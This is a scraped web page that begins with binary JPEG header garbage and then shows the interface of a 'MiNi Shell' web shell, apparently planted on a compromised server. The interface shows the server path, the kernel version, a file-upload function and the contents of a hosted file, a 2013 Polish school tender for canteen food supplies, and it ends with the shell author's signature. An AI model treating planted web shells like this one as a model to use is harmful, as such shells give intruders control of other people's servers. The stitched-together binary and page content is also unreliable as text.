JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131125/482720-N-2013.html

<p class="kh_header"><b>Oświęcim: Dostawa artykułów żywnościowych do stołówki szkolnej na rok 2014</b><br>
<b>Numer ogłoszenia: 482720 - 2013; data zamieszczenia: 25.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Nr 2 Szkół Ogólnokształcących Mistrzostwa Sportowego i Technicznych , ul. Bema 8, 32-602 Oświęcim, woj. małopolskie, tel. 033 8424568, faks 033 8424567.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pz2.edu.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorzadu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej na rok 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych do stołówki szkolnej na rok 2014w grupach towarowych :1. Artykuły ogólnospożywcze , 2.Świeże warzywa i owoce, 3.Świeże pieczywo , 4. Przetwory z mięs, wędliny .5.Świeże mięso wieprzowe , 6. Nabiał i sery, 
7. Świeże mięso drobiowe, 8. Mrożone warzywa i owoce i inne przetwory mrożone

1.	Podane w opisie przedmiotu zamówienia i formularzu ofertowym ilości towarów są jedynie wielkościami szacunkowymi , służą wyłącznie do obliczenia ceny oferty . zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach , może ona ulec zmianom w trakcie realizacji umowy .ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy. W Przypadku zrealizowania mniejszej wartości lub ilości przedmiotu zamówienia , niż wynika z określonego umową przedmiotu zamówienia . Wykonawcy nie przysługują żadne roszczenia w stosunku do Zamawiającego. 
2.	Zamawiający wymaga , aby Wykonawca ubiegający się o zamówienie spełniał wszystkie wymagania dotyczące higieny określone w ustawie o bezpieczeństwie żywności i żywienia 
     ( Dz. U. z 2013  poz . 907  ze zm. .) oraz obowiązujących aktach wykonawczych
      wydanych na ich podstawie . 
3.	Dostarczane produkty winny odpowiadać Polskim Normom oraz być zgodne z normami określonymi i obowiązującymi na obszarze Unii Europejskiej . Materiał opakowaniowy winien być dopuszczony do kontaktu z żywnością . Każdy asortyment produktów misi być dostarczony w oddzielnym pojemniku . Mięso i wędliny musza być dostarczone w czystych , zamkniętych pojemnikach przystosowanych do przewozu mięsa i wędlin. Mięso surowe nie może być przewożone razem z wędlinami.
4.	Produkty oznakowane mają być zgodnie z wymogami rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 w sprawie znakowania środków spożywczych (dz. U. Nr. 137, poz. 966 ze zm. ), w szczególności muszą zawierać nazwę , wykaz i ilość składników , zawartość netto w opakowaniu , datę minimalnej trwałości lub termin przydatności do spożycia , warunki przechowywania , firmę i adres producenta lub przedsiębiorcy paczkującego środek spożywczy ,nazwę i adres producenta . 
5.	Wykonawca będzie zobowiązany do dostarczania zamawianych artykułów do siedziby szkoły własnym transportem , na własny koszt i ryzyko , transportem przystosowanym do przewozu żywności , jak również do rozładunku towaru i złożenia go w miejscu wskazanym przez osobę odbierającą daną dostawę w jego magazynach . 
6.	wykonawca ponosi odpowiedzialność za wady jakościowe dostarczanych produktów (ukryte i nie ukryte ) i za uszkodzenia powstałe w wyniku ich transportu oraz zobowiązany jest do niezwłocznej wymiany wadliwego towaru we własnym zakresie i na własny koszt. 
7.	Zamówienia na dostawy bieżące , zgodnie z potrzebami Zamawiającego będą składane z minimum jednodniowym wyprzedzeniem , drogą elektroniczna , telefonicznie , faxem lub pisemnie w czasie jednej dostawy na dostawę następną . 
8.	Każdy samochód , którym będzie dostarczana żywność musi posiadać decyzję Państwowego Inspektora Sanitarnego  stwierdzającego  spełnienie warunków do higienicznego przewozu określonych produktów ( art. spożywcze , warzywa , owoce , jaja , mięso i wędliny itp.).  Zamawiający zastrzega sobie prawo zażądania stosownego dokumentu w momencie dostawy produktów.  
9.	Jaja przy każdej dostawie , musza posiadać dokument identyfikacyjny dla jaj konsumpcyjnych spełniających wymogi art. 27.ust.3  ustawy z dnia 20.01. 2004 r o wymaganiach weterynaryjnych produktów pochodzenia zwierzęcego ( Dz. U. nr 33, poz. 288 z późn.  zm. ).  
10.	Mrożonki mają być dostarczane do szkoły w formie nie rozmnożonej . 
11.	Wykonawca zobowiązuje się dostarczać produkty świeże , pełnowartościowe, należytej jakości artykuły spożywcze w pierwszym gatunku , w terminie i ilościach określonych  przez Zamawiającego , dostarczane nie później , niż w połowie okresu przydatności do spożycia przewidzianego dla danego produktu , z zastrzeżeniem : pieczywo i wyroby cukiernicze wyprodukowane będą w dobie dostawy ; ryby mrożonki będą posiadać termin przydatności do spożycia nie krótszy niż 30 dni od dostawy ; jaja konsumpcyjne nie będą starsze niż 7 dni od daty pakowania ; warzywa i owoce  świeże cechować się będą regularnym kształtem właściwym dla danej odmiany , będą wolne od szkodników , zanieczyszczeń ziemią , uszkodzeń , oznak wyrastania korzenia w pęd nasienny ;, brakiem oznak więdnięcia , wyschnięcia czy  gnicia ; mięsa i wędliny będą produktami świeżymi  terminem przydatności do spożycia nie krótszym niż 5 dni od dostawy . Dostarczone produkty muszą być zgodne z opisem zawartym w złożonej ofercie . W przypadku dostawy produktu równoważnego , zamawiający wymaga , aby opakowanie tego produktu zawierało wszystkie informacje umożliwiające identyfikację spełnienia wskazanych wymagań minimalnych dla danego produktu ( gramatura, zawartość procentowa poszczególnych składników , wydajność opakowania , wartość odżywcza itp.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-9, 15.30.00.00-1, 15.81.00.00-9, 15.11.00.00-1, 15.11.13.00-1, 15.50.00.00-3, 15.11.21.30-6, 15.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
	mają uprawnienia do występowania w obrocie prawnym,
	wykonają zamówienie w określonym terminie tj. styczeń - grudzień 2014r,
	zaakceptują warunki określone w projekcie umowy,
	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 oraz spełniają  wymogi art. 22 ust. 1,  ustawy Prawo zamówień publicznych tj.:
	posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny i dysponują osobami zdolnymi do wykonania zamówienia,
	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
	Zamawiający dopuszcza składanie ofert wspólnie przez kilku Wykonawców działających w ramach konsorcjum, przy czym każdy z Wykonawców musi spełniać warunki i przedstawić dokumenty określone w niniejszej specyfikacji. W ww przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego,
     oraz oferta będzie spełniać następujące warunki:
	powinna być sporządzona na formularzu oferty stanowiącym załącznik Nr 1 lub  w jego  oparciu i powinna zawierać dokumenty i oświadczenia zgodnie ze  specyfikacją istotnych warunków zamówienia,
	 powinna być złożona w terminie wyznaczonym przez Zamawiającego.

      Wymagania Zamawiającego w stosunku do składanej oferty :
	Wykonawca nie może dokonać zmian w treści formularza ofertowego stanowiącego załącznik Nr 1 SIWZ  8 części zamówienia , a w szczególności usunąć jakichkolwiek zapisów . 
Wszędzie tam , gzie przedmiot zamówienia jest opisany poprzez wskazanie znaków towarowych , patentów lub pochodzenia , Zamawiający dopuszcza zastosowanie przez Wykonawcę  rozwiązań równoważnych w stosunku do opisanych , pod warunkiem ,że będą one posiadały  co najmniej takie same lub lepsze właściwości w stosunku do wymaganych przez Zamawiającego.
      Ocena spełnienia  warunku równoważności należy do Zamawiającego .    Zamawiający dokona oceny spełnienia warunków na podstawie przedłożonych przez  Wykonawcę  dokumentów , wg formuły spełnia nie spełnia , w oparciu o informacje zawarte w dokumentach  i oświadczeniach  wymaganych przez zamawiającego i wskazanych w SIWZ  dołączonych do oferty.  

Zamawiający wezwie w trybie art. 26.  ust. 3 ustawy Prawo Zamówień publicznych Wykonawców , którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów , o których mowa w art. . 25 ust.1, lub którzy nie złożyli pełnomocnictw , albo którzy nie złożyli pełnomocnictw , albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty , o których mowa w art. 25.ust.1, , lub którzy nie złożyli pełnomocnictw , albo którzy złożyli wymagane przez  Zamawiającego oświadczenia i dokumenty , o których mowa w art. 25 ust.1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa , do ich złożenia w wyznaczonym terminie chyba , że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia dokumenty powinny potwierdzić spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy lub usługi wymagań określonych przez Zamawiającego , nie później niż  w dniu , w którym upłynął termin składania ofert. Wykonawca , który nie spełni każdego z ww warunków zostanie wykluczony z postępowania jako oferta odrzucona. 

W celu potwierdzenia , że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r - Prawo zamówień publicznych, Wykonawca składa następujące  dokumenty:
1.Formularz ofertowy wg  wzoru stanowiącego załącznik Nr 1 do SIWZ,  Składający ofertę częściową wypełnia oddzielnie Formularz oferty  na każdą grupę towarów żywnościowych  
2.Wypełniony wykaz zamawianych towarów wg załącznika nr 5 Składający ofertę musi wypełnić wszystkie pozycje z załącznika nr 5 - wykaz zamawianych towarów oraz składający ofertę częściową oddzielnie wykaz na każdą grupę towarów żywnościowych  
3.Oświadczenie, że Wykonawca spełnia wymogi art. 22 ust.1 pkt. 1- 4 wg wzoru stanowiącego załącznik Nr 2 do SIWZ.
4.Oświadczenie, że Wykonawca  nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1  ustawy Prawo zamówień publicznych wg wzoru stanowiącego załącznik Nr 3 do SIWZ.
5.Aktualny dokument dopuszczający Wykonawcę do obrotu prawnego w zakresie objętym zamówieniem tj. odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
6.Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
7.Projekt umowy    wg załącznika nr 4  powinien być zaakceptowany przez osobę lub osoby upoważnione do reprezentowania podmiotu składającego ofertę - wg wzoru stanowiącego załącznik Nr 1 do SIWZ, 
8.Oświadczenie, że Wykonawca zapoznał się z warunkami przetargu określonymi w niniejszej specyfikacji i przyjmuje je bez zastrzeżeń   wg wzoru stanowiącego załącznik Nr 1 do SIWZ, 
9.	Oświadczenie, że Wykonawca  pozostaje związany ze złożoną przez siebie ofertą przez okres 30 dni wg wzoru stanowiącego załącznik Nr 1 do SIWZ,      
10 . Wykaz  Lista podmiotów należących do tej samej grupy kapitałowej 
      Informacja o tym, że wykonawca nie należy do grupy kapitałowej   wg wzoru stanowiącego  załącznik nr 6 do SIWZ 
11.  Oświadczenie , informacja o podwykonawcach wg wzoru stanowiącego załącznik  nr 7 do SIWZ
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę  , osoby  uprawnioną do podpisania oferty z dopiskiem  za zgodność  z oryginałem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Okres stałości ceny wynosi 3 miesiące od daty zawarcia umowy.
2.	Po upływie okresu stałości ceny dostawca może zmienić cenę na dostarczane towary o współczynnik wzrostu cen towarów i usług konsumpcyjnych ogłoszony przez GUS za kwartał poprzedni.
3.	Wzrost cen wymaga akceptacji zamawiającego wyrażonej na piśmie.
4.	Zmiana ceny  dostarczanych artykułów żywnościowych może nastąpić przy zmianie podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pz2.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespól nr 2 SOMSiT w Oświęcimiu , 32-602 Oświęcim , ul. Bema 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 11:00, miejsce: Powiatowy Zespól nr 2 SOMSiT w Oświęcimiu , 32-602 Oświęcim , ul. Bema 8 , pok nr 60 sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com